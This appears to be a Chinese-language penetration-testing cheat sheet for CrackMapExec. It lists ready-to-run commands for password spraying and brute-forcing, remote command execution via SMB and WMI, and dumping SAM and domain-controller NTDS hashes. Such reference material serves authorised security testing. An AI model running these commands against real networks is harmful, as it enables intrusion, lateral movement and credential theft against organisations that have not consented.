Crackmapexec
2023-05-06
3 min read
官网:https://github.com/Porchetta-Industries/CrackMapExec
Windows 版本:https://github.com/maaaaz/CrackMapExecWin
参考文章:
- https://cangqingzhe.github.io/2020/08/26/%E5%85%B3%E4%BA%8E%E5%86%85%E7%BD%91%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8%E5%A5%97%E4%BB%B6%E7%9A%84%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93/
- ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/
目标格式
每个协议都支持以CIDR表示法,IP地址,IP范围,主机名或包含目标列表的文件格式。
crackmapexec <protocol> ms.evilcorp.org
crackmapexec <protocol> 192.168.1.0 192.168.0.2
crackmapexec <protocol> 192.168.1.0/24
crackmapexec <protocol> 192.168.1.0-28 10.0.0.1-67
crackmapexec <protocol> ~/targets.txt
支持协议
ssh own stuff using SSH
smb own stuff using SMB
ldap own stuff using LDAP
winrm own stuff using WINRM
mssql own stuff using MSSQL
使用凭据
crackmapexec <protocol> <target(s)> -u username -p password
crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@'
爆破&喷洒
crackmapexec <protocol> <target(s)> -u username1 -p password1 password2
crackmapexec <protocol> <target(s)> -u username1 username2 -p password1
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes
常见使用方法
网络枚举&扫描
crackmapexec 192.168.1.1/24
命令执行
crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
SMB执行命令
crackmapexec.exe -d medtech.com -u administrator -p xxx -t 1 host.txt --execm smbexec -x "whoami /user"
WMI 执行命令
crackmapexec.exe -d medtech.com -u administrator -p xxxx -t 1 host.txt --execm wmi -x "whoami /user"
Dump Hashs
crackmapexec.exe -d . -u administrator -H xxxx:xxxx -t 1 --sam host.txt
导出域控Hash
crackmapexec.exe -d rootkit -u administrator -p xxx -t 1 192.168.3.144 --ntds vss